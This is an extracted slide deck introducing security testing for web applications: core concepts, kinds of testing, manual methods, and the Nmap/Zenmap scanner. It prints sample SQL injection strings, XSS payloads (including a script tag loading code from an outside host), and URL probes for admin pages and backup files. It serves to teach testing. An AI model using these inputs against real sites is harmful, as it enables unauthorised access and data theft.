Security Testing For Web Applications

Created by: Kristina FilipyanReviewed by: Vladimir SoghoyanOgma Applications

Design and development errors

Poor system configuration

Human errors

Causes of vulnerabilities

AuthenticationDetermining the act of confirming the truth of an attribute of a datum or entity.

AuthorizationDetermining that a requester is allowed to receive a service or perform an

operation.

ConfidentialityA security measure which protects the disclosure of data or information to parties

other than the intended.

IntegrityWhether the intended receiver receives the information or data which is not altered

in transmission.

Non-repudiation(session time limitations) Interchange of authentication information with some form

of provable time stamp e.g. with session id .

Security testing concepts

Vulnerability Scanning Method to assess computers, computer systems, networks or applications for weaknesses.

Security ScanningSecurity Scanning is a Vulnerability Scan

Penetration TestingMethod of evaluating the security of a computer system or network by simulating an attack

Risk AssessmentRisk Assessment involves a security analysis of interviews compiled with research of business, legal, and industry justifications.

Security AuditingSecurity Auditing involves hands on internal inspection of Operating Systems

andApplications, often via line-by-line inspection of the code.

Ethical HackingThis is basically a number of Penetration Tests on a number of

systems on a network segment.

Security Testing Types

To secure financial data while transferring between different system

To secure user data To find security vulnerabilities in an

application

Why Security testing is needed?

URL manipulation

SQL injection

XSS (Cross Site Scripting)

Main methods of manual security testing

Search for directories making it possible to administer the site: http://target/admin/http://target/admin.cgi

Search for a script to reveal information about the remote system: http://target/phpinfo.php3

Search for backup copies. The .bak extension is generally used and is not interpreted by servers by default, which can cause a script to be displayed: http://target/.bak

URL manipulation through HTTP GET methods examples

SELECT fieldlist

FROM table WHERE field = ‘username@domain.com'';

SELECT fieldlist

FROM table WHERE field = 'x' AND email IS NULL; --';

SELECT email, passwd, login_id, full_name FROM table

WHERE email = 'x' AND 1=(SELECT COUNT(*) FROM tabname); --';

SQL Injection examples

'';!--"<XSS>=&{()}

<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>

<IMG SRC="javascript:alert('XSS');">

Cross Site Scripting (XSS)

XSS Attack example on RockSquare:

XSS Input XSS Attack Results

NMAP (free source)Security scanner used to discover hosts and services on a computer network.

GFI LANguard (licensed)Network Security Scanner and Vulnerability Management Tool.

Automated security testing tools:

Zenmap is the official Nmap Security Scanner GUI

Zenmap action shots:Nmap Output

Hosts and PostsTopologyHost Details

What is Zenmap ?

Nmap Output:

The “Nmap Output” shows scanning results.

Hosts and Ports

“Ports / Hosts” tab shows all the hosts which have that port open filtered, or closed.

Topology

The “Topology” tab is an interactive view of the connections between hosts in a network.

Host Details

The “Host Details” tab breaks all the information about a single host into a hierarchical display.

Nmap sends specially crafted packets to the target host and then analyzes the responses.

Nmap can determine the operating system of the target, names and versions of the listening services, estimated uptime, type of device, and presence of a firewall.

The goal of the Nmap

Thank You